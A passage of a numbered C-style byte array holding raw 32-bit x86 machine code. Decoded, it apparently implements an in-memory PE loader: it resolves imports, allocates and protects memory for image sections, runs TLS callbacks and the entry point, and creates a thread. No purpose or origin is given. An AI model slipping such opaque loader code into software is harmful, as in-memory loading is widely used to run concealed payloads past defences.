963 0x04, 0x24, 0xe8, 0x40, 0xde, 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0xe0,
964 0x89, 0x10, 0x83, 0x45, 0xe4, 0x04, 0x83, 0x45, 0xe0, 0x04, 0xe9, 0x32,
965 0xff, 0xff, 0xff, 0x90, 0x83, 0x45, 0xdc, 0x14, 0x8b, 0x45, 0xdc, 0x8b,
966 0x40, 0x0c, 0x85, 0xc0, 0x0f, 0x85, 0xcf, 0xfe, 0xff, 0xff, 0x8b, 0x45,
967 0xa8, 0x8b, 0x80, 0xe0, 0x00, 0x00, 0x00, 0x89, 0x45, 0x84, 0x83, 0x7d,
968 0x84, 0x00, 0x0f, 0x84, 0x1f, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x1c, 0xfc,
969 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x45, 0xd8,
970 0xe9, 0xfc, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x04, 0x8b,
971 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x7c, 0xff, 0xff,
972 0xff, 0x8b, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x8b,
973 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x1e, 0xe0, 0xff, 0xff, 0x89, 0x85,
974 0x78, 0xff, 0xff, 0xff, 0x83, 0xbd, 0x78, 0xff, 0xff, 0xff, 0x00, 0x0f,
975 0x84, 0xb8, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x10, 0x8b,
976 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45,
977 0xd8, 0x8b, 0x50, 0x0c, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0,
978 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x85, 0xc0, 0x0f, 0x84,
979 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x85, 0xc0, 0x79,
980 0x2f, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44,
981 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff,
982 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x54,
983 0xdd, 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x89, 0x10, 0xeb, 0x44,
984 0x8b, 0x45, 0xe4, 0x8b, 0x10, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01,
985 0xd0, 0x89, 0x85, 0x74, 0xff, 0xff, 0xff, 0x8b, 0x85, 0x74, 0xff, 0xff,
986 0xff, 0x83, 0xc0, 0x02, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00,
987 0x89, 0x44, 0x24, 0x08, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x89, 0x44,
988 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x0e, 0xdd, 0xff,
989 0xff, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x89, 0x10, 0x83, 0x45, 0xe4, 0x04,
990 0x83, 0x45, 0xe0, 0x04, 0xe9, 0x6a, 0xff, 0xff, 0xff, 0x90, 0xeb, 0x01,
991 0x90, 0x83, 0x45, 0xd8, 0x20, 0x8b, 0x45, 0xd8, 0x8b, 0x40, 0x04, 0x85,
992 0xc0, 0x0f, 0x85, 0xf6, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xa8, 0x8b, 0x50,
993 0x28, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x70,
994 0xff, 0xff, 0xff, 0x8b, 0x55, 0xa8, 0x8d, 0x85, 0x44, 0xfe, 0xff, 0xff,
995 0x89, 0xd3, 0xba, 0x3e, 0x00, 0x00, 0x00, 0x89, 0xc7, 0x89, 0xde, 0x89,
996 0xd1, 0xf3, 0xa5, 0xc7, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,
997 0x00, 0x0f, 0xb7, 0x85, 0x4a, 0xfe, 0xff, 0xff, 0x0f, 0xb7, 0xd0, 0x89,
998 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x89, 0x85, 0x10,
999 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44,
1000 0x24, 0x14, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x30,
1001 0x00, 0x00, 0x8d, 0x85, 0x10, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c,
1002 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x3c, 0xff,
1003 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff,
1004 0xff, 0xe8, 0xbe, 0x2b, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90,
1005 0x00, 0x0f, 0x88, 0xfe, 0x08, 0x00, 0x00, 0x0f, 0xb7, 0x85, 0x4a, 0xfe,
1006 0xff, 0xff, 0x0f, 0xb7, 0xd0, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0,
1007 0xc1, 0xe0, 0x03, 0x89, 0xc2, 0x8b, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x89,
1008 0x54, 0x24, 0x08, 0x8b, 0x55, 0x8c, 0x89, 0x54, 0x24, 0x04, 0x89, 0x04,
1009 0x24, 0xe8, 0x44, 0x25, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x48,
1010 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x6c, 0x8b, 0x45, 0x08, 0x0f,
1011 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x3f, 0x8b, 0x45,
1012 0xa8, 0x8b, 0x50, 0x54, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x54,
1013 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x04,
1014 0x24, 0xe8, 0xda, 0x24, 0x00, 0x00, 0x8b, 0x45, 0xa8, 0x8b, 0x40, 0x54,
1015 0x89, 0x44, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00,
1016 0x8b, 0x45, 0xb0, 0x89, 0x04, 0x24, 0xe8, 0xbd, 0x24, 0x00, 0x00, 0xeb,
1017 0x1f, 0x8b, 0x45, 0xa8, 0x8b, 0x50, 0x54, 0x8b, 0x85, 0x1c, 0xfc, 0xff,
1018 0xff, 0x89, 0x54, 0x24, 0x08, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0xb0,
1019 0x89, 0x04, 0x24, 0xe8, 0xca, 0x24, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x0f,
1020 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x85, 0xb2, 0x00,
1021 0x00, 0x00, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89,
1022 0x54, 0x24, 0x08, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff,
1023 0xff, 0xff, 0xe8, 0x34, 0x2a, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d,
1024 0x90, 0x00, 0x0f, 0x88, 0x1c, 0x08, 0x00, 0x00, 0x83, 0x7d, 0x94, 0x00,
1025 0x74, 0x0a, 0xc7, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
1026 0xc7, 0x85, 0x18, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85,
1027 0x2c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89, 0x54, 0x24, 0x28, 0xc7,
1028 0x44, 0x24, 0x24, 0x80, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00,
1029 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c, 0x02, 0x00, 0x00, 0x00, 0x8d,
1030 0x95, 0x18, 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x18, 0xc7, 0x44, 0x24,
1031 0x14, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x00, 0x00,
1032 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x95, 0x1c,
1033 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0xff,
1034 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0x91, 0x29, 0x00, 0x00, 0x89,
1035 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x97, 0x07, 0x00, 0x00,
1036 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x85, 0x30, 0xfc, 0xff,
1037 0xff, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0x08, 0x00, 0x00,
1038 0x00, 0x8d, 0x85, 0x18, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x8d,
1039 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24,
1040 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd5, 0x29, 0x00, 0x00, 0x89, 0x45, 0x90,
1041 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x54, 0x07, 0x00, 0x00, 0xc7, 0x45,
1042 0xc4, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x88, 0x02, 0x00, 0x00, 0x8b, 0x8d,
1043 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02,
1044 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8,
1045 0x1e, 0x83, 0xe0, 0x01, 0x89, 0x85, 0x50, 0xff, 0xff, 0xff, 0x8b, 0x8d,
1046 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02,
1047 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8,
1048 0x1f, 0x89, 0x85, 0x4c, 0xff, 0xff, 0xff, 0x8b, 0x8d, 0x3c, 0xff, 0xff,
1049 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1,
1050 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8, 0x1d, 0x83, 0xe0,
1051 0x01, 0x89, 0x85, 0x48, 0xff, 0xff, 0xff, 0x83, 0xbd, 0x4c, 0xff, 0xff,
1052 0xff, 0x00, 0x74, 0x15, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff, 0x00, 0x74,
1053 0x0c, 0xc7, 0x45, 0xbc, 0x80, 0x00, 0x00, 0x00, 0xe9, 0xed, 0x00, 0x00,
1054 0x00, 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x74, 0x15, 0x83, 0xbd,
1055 0x48, 0xff, 0xff, 0xff, 0x00, 0x74, 0x0c, 0xc7, 0x45, 0xbc, 0x20, 0x00,
1056 0x00, 0x00, 0xe9, 0xcf, 0x00, 0x00, 0x00, 0x83, 0xbd, 0x50, 0xff, 0xff,
1057 0xff, 0x00, 0x74, 0x38, 0x83, 0xbd, 0x4c, 0xff, 0xff, 0xff, 0x00, 0x74,
1058 0x2f, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff, 0x00, 0x75, 0x26, 0x8b, 0x45,
1059 0x08, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x0c,
1060 0xc7, 0x45, 0xbc, 0x08, 0x00, 0x00, 0x00, 0xe9, 0x9a, 0x00, 0x00, 0x00,
1061 0xc7, 0x45, 0xbc, 0x04, 0x00, 0x00, 0x00, 0xe9, 0x8e, 0x00, 0x00, 0x00,
1062 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x75, 0x1b, 0x83, 0xbd, 0x4c,
1063 0xff, 0xff, 0xff, 0x00, 0x75, 0x12, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff,
1064 0x00, 0x74, 0x09, 0xc7, 0x45, 0xbc, 0x10, 0x00, 0x00, 0x00, 0xeb, 0x6a,
1065 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x74, 0x1b, 0x83, 0xbd, 0x4c,
1066 0xff, 0xff, 0xff, 0x00, 0x75, 0x12, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff,
1067 0x00, 0x75, 0x09, 0xc7, 0x45, 0xbc, 0x02, 0x00, 0x00, 0x00, 0xeb, 0x46,
1068 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x75, 0x1b, 0x83, 0xbd, 0x4c,
1069 0xff, 0xff, 0xff, 0x00, 0x75, 0x12, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff,
1070 0x00, 0x75, 0x09, 0xc7, 0x45, 0xbc, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x22,
1071 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x75, 0x19, 0x83, 0xbd, 0x4c,
1072 0xff, 0xff, 0xff, 0x00, 0x74, 0x10, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff,
1073 0x00, 0x75, 0x07, 0xc7, 0x45, 0xbc, 0x08, 0x00, 0x00, 0x00, 0x8b, 0x8d,
1074 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02,
1075 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0x25, 0x00,
1076 0x00, 0x00, 0x04, 0x85, 0xc0, 0x74, 0x07, 0x81, 0x4d, 0xbc, 0x00, 0x02,
1077 0x00, 0x00, 0x8b, 0x8d, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x9d, 0x3c, 0xff,
1078 0xff, 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0,
1079 0xc1, 0xe0, 0x03, 0x01, 0xd8, 0x8b, 0x40, 0x0c, 0x01, 0xc8, 0x89, 0x85,
1080 0x38, 0xfc, 0xff, 0xff, 0x0f, 0xb7, 0x85, 0x4a, 0xfe, 0xff, 0xff, 0x0f,
1081 0xb7, 0xc0, 0x83, 0xe8, 0x01, 0x39, 0x45, 0xc4, 0x73, 0x43, 0x8b, 0x8d,
1082 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xc4, 0x8d, 0x50, 0x01, 0x89, 0xd0,
1083 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40,
1084 0x0c, 0x89, 0xc3, 0x8b, 0x8d, 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xc4,
1085 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8,
1086 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x89, 0xd8, 0x29, 0xd0, 0x89, 0x85, 0x34,
1087 0xfc, 0xff, 0xff, 0xeb, 0x1e, 0x8b, 0x8d, 0x3c, 0xff, 0xff, 0xff, 0x8b,
1088 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03,
1089 0x01, 0xc8, 0x8b, 0x40, 0x10, 0x89, 0x85, 0x34, 0xfc, 0xff, 0xff, 0xc7,
1090 0x85, 0x30, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4,
1091 0x89, 0x44, 0x24, 0x14, 0x8d, 0x85, 0x30, 0xfc, 0xff, 0xff, 0x89, 0x44,
1092 0x24, 0x10, 0x8b, 0x45, 0xbc, 0x89, 0x44, 0x24, 0x0c, 0x8d, 0x85, 0x34,
1093 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x85, 0x38, 0xfc, 0xff,
1094 0xff, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff,
1095 0xe8, 0x45, 0x27, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00,
1096 0x0f, 0x88, 0xc7, 0x04, 0x00, 0x00, 0x83, 0x45, 0xc4, 0x01, 0x0f, 0xb7,
1097 0x85, 0x4a, 0xfe, 0xff, 0xff, 0x0f, 0xb7, 0xc0, 0x39, 0x45, 0xc4, 0x0f,
1098 0x82, 0x65, 0xfd, 0xff, 0xff, 0xc7, 0x85, 0x30, 0xfc, 0xff, 0xff, 0x00,
1099 0x00, 0x00, 0x00, 0x8b, 0x85, 0x70, 0xfe, 0xff, 0xff, 0x89, 0x85, 0x34,
1100 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x85,
1101 0x30, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c,
1102 0x02, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x34, 0xfc, 0xff, 0xff, 0x89, 0x44,
1103 0x24, 0x08, 0x8d, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04,
1104 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd2, 0x26, 0x00, 0x00,
1105 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x57, 0x04, 0x00,
1106 0x00, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08,
1107 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00,
1108 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x5f, 0x27, 0x00, 0x00,
1109 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x2a, 0x04, 0x00,
1110 0x00, 0x8b, 0x85, 0x04, 0xff, 0xff, 0xff, 0x89, 0x45, 0x84, 0x83, 0x7d,
1111 0x84, 0x00, 0x74, 0x57, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0xc2,
1112 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x85, 0x6c, 0xff, 0xff, 0xff, 0x8b,
1113 0x85, 0x6c, 0xff, 0xff, 0xff, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xd4, 0x83,
1114 0x7d, 0xd4, 0x00, 0x74, 0x32, 0xeb, 0x27, 0x8b, 0x45, 0xd4, 0x8b, 0x00,
1115 0x8b, 0x95, 0x1c, 0xfc, 0xff, 0xff, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00,
1116 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x14,
1117 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x83, 0x45, 0xd4, 0x04, 0x8b, 0x45,
1118 0xd4, 0x8b, 0x00, 0x85, 0xc0, 0x75, 0xd0, 0x8b, 0x45, 0x0c, 0x8b, 0x00,
1119 0x83, 0xf8, 0x03, 0x0f, 0x85, 0xd9, 0x01, 0x00, 0x00, 0x8b, 0x95, 0x6c,
1120 0xfe, 0xff, 0xff, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89,
1121 0x85, 0x68, 0xff, 0xff, 0xff, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0xc7,
1122 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x01,
1123 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0x8b, 0x85, 0x68, 0xff, 0xff, 0xff,
1124 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x80, 0x0c,
1125 0x03, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x84, 0xbb, 0x02, 0x00, 0x00, 0x8b,
1126 0x85, 0xbc, 0xfe, 0xff, 0xff, 0x89, 0x45, 0x84, 0x8b, 0x85, 0x1c, 0xfc,
1127 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x85, 0x64,
1128 0xff, 0xff, 0xff, 0x83, 0x7d, 0x84, 0x00, 0x0f, 0x84, 0x95, 0x02, 0x00,
1129 0x00, 0x8b, 0x85, 0x64, 0xff, 0xff, 0xff, 0x8b, 0x40, 0x18, 0x89, 0x45,
1130 0xc0, 0x83, 0x7d, 0xc0, 0x00, 0x0f, 0x84, 0x7f, 0x02, 0x00, 0x00, 0x8b,
1131 0x85, 0x64, 0xff, 0xff, 0xff, 0x8b, 0x50, 0x1c, 0x8b, 0x85, 0x1c, 0xfc,
1132 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x60, 0xff, 0xff, 0xff, 0x8b, 0x85,
1133 0x64, 0xff, 0xff, 0xff, 0x8b, 0x50, 0x20, 0x8b, 0x85, 0x1c, 0xfc, 0xff,
1134 0xff, 0x01, 0xd0, 0x89, 0x85, 0x5c, 0xff, 0xff, 0xff, 0x8b, 0x85, 0x64,
1135 0xff, 0xff, 0xff, 0x8b, 0x50, 0x24, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff,
1136 0x01, 0xd0, 0x89, 0x85, 0x58, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xc0, 0x05,
1137 0xff, 0xff, 0xff, 0x3f, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b,
1138 0x85, 0x5c, 0xff, 0xff, 0xff, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x85, 0x1c,
1139 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x54, 0xff, 0xff, 0xff, 0x8b,
1140 0x45, 0x0c, 0x05, 0x0c, 0x03, 0x00, 0x00, 0x89, 0x44, 0x24, 0x04, 0x8b,
1141 0x85, 0x54, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0x2b, 0x20, 0x00,
1142 0x00, 0x85, 0xc0, 0x75, 0x37, 0x8b, 0x45, 0xc0, 0x05, 0xff, 0xff, 0xff,
1143 0x7f, 0x8d, 0x14, 0x00, 0x8b, 0x85, 0x58, 0xff, 0xff, 0xff, 0x01, 0xd0,
1144 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00,
1145 0x00, 0x8b, 0x85, 0x60, 0xff, 0xff, 0xff, 0x01, 0xd0, 0x8b, 0x10, 0x8b,
1146 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x45, 0xc8, 0xeb, 0x0e,
1147 0x83, 0x6d, 0xc0, 0x01, 0x83, 0x7d, 0xc0, 0x00, 0x0f, 0x85, 0x76, 0xff,
1148 0xff, 0xff, 0x83, 0x7d, 0xc8, 0x00, 0x0f, 0x84, 0xa5, 0x01, 0x00, 0x00,
1149 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00, 0x84, 0xc0,
1150 0x74, 0x5c, 0x8b, 0x45, 0x0c, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x85,
1151 0xc0, 0x74, 0x22, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x04, 0x00, 0x00,
1152 0x8d, 0x85, 0x3e, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54,
1153 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x3e, 0xd4, 0xff,
1154 0xff, 0x8b, 0x45, 0x0c, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc0,
1155 0x74, 0x08, 0x8d, 0x85, 0x3e, 0xfc, 0xff, 0xff, 0xeb, 0x08, 0x8b, 0x45,
1156 0x0c, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x89, 0x04, 0x24, 0x8b, 0x45, 0xc8,
1157 0xff, 0xd0, 0x83, 0xec, 0x04, 0xe9, 0x3c, 0x01, 0x00, 0x00, 0x8b, 0x45,
1158 0xc8, 0x89, 0x45, 0xb8, 0x8b, 0x45, 0xb8, 0xff, 0xd0, 0xe9, 0x2c, 0x01,
1159 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00,
1160 0x84, 0xc0, 0x74, 0x37, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x04, 0x00,
1161 0x00, 0x8d, 0x85, 0x3e, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89,
1162 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xd1, 0xd3,
1163 0xff, 0xff, 0x8d, 0x85, 0x3e, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04,
1164 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xe1, 0x02, 0x00, 0x00, 0x8b,
1165 0x45, 0x0c, 0x8b, 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x84, 0xa3, 0x00, 0x00,
1166 0x00, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x2c, 0xc7, 0x44, 0x24, 0x28,
1167 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x24, 0x00, 0x00, 0x00, 0x00,
1168 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c,
1169 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x18, 0x00, 0x00, 0x00, 0x00,
1170 0xc7, 0x44, 0x24, 0x14, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x70, 0xff,
1171 0xff, 0xff, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0xff, 0xff,
1172 0xff, 0xff, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44,
1173 0x24, 0x04, 0xff, 0xff, 0x1f, 0x00, 0x8d, 0x85, 0x40, 0xfe, 0xff, 0xff,
1174 0x89, 0x04, 0x24, 0xe8, 0x30, 0x24, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83,
1175 0x7d, 0x90, 0x00, 0x78, 0x69, 0x8b, 0x85, 0x40, 0xfe, 0xff, 0xff, 0x8b,
1176 0x55, 0xb4, 0x89, 0x54, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00,
1177 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x04,
1178 0x24, 0xe8, 0x45, 0x23, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90,
1179 0x00, 0x79, 0x3b, 0xe9, 0xee, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x44, 0xff,
1180 0xff, 0xff, 0x18, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x44, 0xff, 0xff, 0xff,
1181 0x64, 0x8b, 0x00, 0x89, 0x85, 0x40, 0xff, 0xff, 0xff, 0x8b, 0x85, 0x40,
1182 0xff, 0xff, 0xff, 0x8b, 0x40, 0x30, 0x89, 0x04, 0x24, 0x8b, 0x85, 0x70,
1183 0xff, 0xff, 0xff, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xeb, 0x04, 0x90, 0xeb,
1184 0x01, 0x90, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84,
1185 0xaa, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x10, 0xfc, 0xff, 0xff, 0x00, 0x00,
1186 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24,
1187 0x0c, 0x00, 0x80, 0x00, 0x00, 0x8d, 0x85, 0x10, 0xfc, 0xff, 0xff, 0x89,
